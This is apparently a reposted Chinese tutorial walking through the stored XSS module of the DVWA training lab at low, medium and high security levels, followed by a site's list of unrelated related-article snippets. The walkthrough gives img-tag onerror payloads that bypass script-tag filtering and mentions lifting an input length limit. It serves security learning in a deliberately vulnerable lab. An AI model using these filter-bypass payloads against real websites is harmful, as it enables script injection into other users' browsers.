                进入low等级的xss存储型模块

                尝试通过简单的JavaScript语句进行攻击

                先将其安全等级改为低

Xss (Stored)

stripslashes:

mysqli_real_escape_string:

数据最后插入显示到index.php

将我们的恶意代码试着插入进去查看一下是否可行

Medium等级:

使用low等级的攻击方式 发现<script>被过滤:

通过查看后端代码发现同存储型xss相同 也是过滤了<script>标签

用img标签

<img%20src=1%20οnerrοr="alert(1337)">

high等级:

注:此时要重新修改name输入栏的长度限制进行绕过

在high等级使用low等级和medium等级的攻击方式都不能成功

同反射性xss相同 在存储型xss注入high等级中 同样使用了replace函数对<script>标签进行了彻底的过滤

尝试img标签进行攻击

代码:<img src=x οnerrοr=alert(‘xss’) >

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2061938.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

计算xpclr

1.conda安装xpclr 首先安装流程很轻松 conda create -n xpclr -c bioconda xpclr conda activate xpclr xpclr -h 2.按照要求准备文件 XPCLR - 简书 (jianshu.com) 根据教程准备文件&#xff0c;vcf&#xff0c;计算好的map&#xff0c;以及样本文件txt 其实官网也有介绍…

django学习入门系列之第九点《案例 Flask+MySQL新增用户》

文章目录 1 新增用户往期回顾 1 新增用户 from flask import Flask, render_template, request import pymysqlapp Flask(__name__)# 创建了网址 /nima和函数index的对应关系 # 以后用户在浏览器上访问/nima自动运行函数 app.route("/nima", methods[GET, POST]) d…

最小区间00

题目链接 最小区间00 题目描述 注意点 -10^5 < nums[i][j] < 10^5nums[i] 按非递减顺序排列找到一个 最小 区间&#xff0c;使得 k 个列表中的每个列表至少有一个数包含在其中 解答思路 参照题解&#xff0c;根据滑动窗口完成本题首先将所有的元素都提取出来并按升序…

为修复漏洞而准备的更新破坏了Windows-Linux双启动的计算机

上周是微软支持的 Windows 操作系统每月一次的"星期二补丁"活动。然而&#xff0c;一个本意是修复漏洞的补丁却给一些使用 Windows 和各种版本 Linux 的双启动电脑带来了问题。 Ars Technica报道称&#xff0c;该更新旨在修复名为CVE-2022-2601 的漏洞。该漏洞于 20…

Ps:首选项 - 工具

Ps菜单&#xff1a;编辑/首选项 Edit/Preferences 快捷键&#xff1a;Ctrl K Photoshop 首选项中的“工具” Tool选项卡允许用户根据自己的使用习惯和工作需求来定制 Photoshop 工具的行为。这些设置能够帮助用户提高操作的效率和精确度&#xff0c;提供更加流畅和符合个人习惯…

电影推荐(2)-----基于物品的协同过滤算法关联性分析

目录 1.算法的简单图解 2.算法的基本分析过程 3.算法的核心 4.算法的实现 5.关联分析的概念 5.1事务和事务库 5.2项 5.3项集 6.支持度 6.1受欢迎程度 6.2最小支持度 6.3关联条件 7.置信度 8.提升度 1.算法的简单图解 2.算法的基本分析过程 3.算法的核心 上面的全…

【个人学习】JVM(7):方法区概述、方法区内部结构、垃圾回收等

方法区 栈、堆、方法区的交互关系 从线程共享与否的角度来看 ThreadLocal:如何保证多个线程在并发环境下的安全性?典型场景就是数据库连接管理,以及会话管理。 栈、堆、方法区的交互关系 下面涉及了对象的访问定位 Person 类的 .class 信息存放在方法区中person 变量存放…

基于web的铁路订票管理系统

TOC springboot347基于web的铁路订票管理系统--论文 研究背景 近年来&#xff0c;由于计算机技术和互联网技术的飞速发展&#xff0c;所有企事业单位内部都是数字化、信息化、无纸化的发展趋势&#xff0c;随着这种趋势的发展&#xff0c;各种决策系统、辅助系统也应运而生&…

计量自动化终端上行通信规约

物理层 TCP 和 UDP 的传输接口 该类接口的登录链接和心跳检测采用链路测试服务&#xff0c;链路测试周期可设定。 参见 TCP/IP 协议规范。 串行通信传输接口 字节传输按异步方式进行&#xff0c;它包含 8 个数据位、1 个起始位“0”、1 个偶校验位 P 和 1 个停止位“1”。 …

SEO优化:如何优化自己的文章,解决搜索引擎不收录的问题

可以使用bing的URL检查&#xff0c;来检查自己的文章是不是负荷收录准测&#xff0c;如果页面有严重的错误&#xff0c;搜索引擎是不会进行收录的&#xff0c;而且还会判定文章为低质量文章&#xff01; 检查是否有问题。下面的页面就是有问题&#xff0c;当然如果是误报你也可…

yolov5和yolov7车牌识别检测(可检测黄牌、绿牌、双层车牌等各种车牌,准确率高,提供界面)

实现一个车牌识别系统&#xff0c;使用YOLOv5和YOLOv7这两种不同的模型来进行车牌的检测。下面我将提供一个完整的项目概述&#xff0c;包括模型训练脚本、车牌识别代码以及两个GUI界面&#xff0c;分别用于处理静态图片和实时视频流 1. 模型训练 YOLOv5 和 YOLOv7 的训练脚本…

Flask条件查询接口出现SQL注入,使用参数化查询:写法的解决方案(附带企业级开发实际例子与经验分享)

背景&#xff1a; 一个接口出现了SQL注入&#xff0c;条件查询场景下出现&#xff0c;形如下图 解决问题时&#xff0c;我们先要问&#xff0c;什么是SQL注入&#xff1f; 下面的资料有助于针对SQL注入是什么、如何验证SQL注入解决成功了&#xff0c;提供一些思路&#xff0c…

【功能自动化】进阶版——使用mysql数据表获取参数,并批量更新数据

环境搭建&#xff1a; 1.需要配置WebTours网站 2.安装pymysql pip install -i https://pypi.tuna.tsinghua.edu.cn/simple pymysql 3.mysql数据表user表内容 实现代码 # 导入包 from selenium import webdriver from selenium.webdriver.support.select import Select f…

Keil C51 插件 检测变量名引用不统一

此插件解决的问题 Keil 插件 -- Python 代码 import chardet, sys, glob import re# 变量名字典 key--数据名 value--数据s类型 variable_dic {} # 报错变量名字典 error_dic {}def add_key(key, value):if key in variable_dic:error_dic[key] valueelse:variable_dic[key…

【js】各类前端输入校验方法

使用方式&#xff1a; 源码&#xff1a; //电话号码 export const checkModbile (rule,value,callback)>{if(value undefined){callback();return;} if(value.length 11){var reg /^1[3,4,5,6,7,8,9][0-9]{9}$/;}else if(value.length 13 || value.length 8 || valu…

SQL 二阶注入 (injection 第二十四关)

简介 SQL注入&#xff08;SQL Injection&#xff09;是一种常见的网络攻击方式&#xff0c;通过向SQL查询中插入恶意的SQL代码&#xff0c;攻击者可以操控数据库&#xff0c;SQL注入是一种代码注入攻击&#xff0c;其中攻击者将恶意的SQL代码插入到应用程序的输入字段中&am…

聚星文社推文软件

聚星文社软件是一款面向作家和读者的社交平台&#xff0c;聚星文社https://iimenvrieak.feishu.cn/docx/ZhRNdEWT6oGdCwxdhOPcdds7nof 致力于为用户提供创作、交流和阅读的全方位服务。 作家可以在平台上发布自己的作品&#xff0c;与读者们进行互动和交流。 读者们则可以在平台…

基于ssm+vue+uniapp的医院挂号预约系统小程序

开发语言&#xff1a;Java框架&#xff1a;ssmuniappJDK版本&#xff1a;JDK1.8服务器&#xff1a;tomcat7数据库&#xff1a;mysql 5.7&#xff08;一定要5.7版本&#xff09;数据库工具&#xff1a;Navicat11开发软件&#xff1a;eclipse/myeclipse/ideaMaven包&#xff1a;M…

【气象百科】光伏自动气象站的功能优势

随着全球对可再生能源需求的日益增长&#xff0c;光伏发电作为清洁、可再生的能源形式&#xff0c;正逐步成为推动能源转型的重要力量。而光伏自动气象站&#xff0c;作为光伏电站智能化管理的重要组成部分&#xff0c;其独特的功能优势在提升光伏系统效率、优化运维策略、增强…

安全检测GO内外链跳转页面html源码

源码介绍 一款清新好看的跳转源码&#xff0c;底部自行更换跳转目标地址&#xff0c;可用来预防人机或者进行c验证页面&#xff01; 源码下载 安全检测GO内外链跳转页面html源码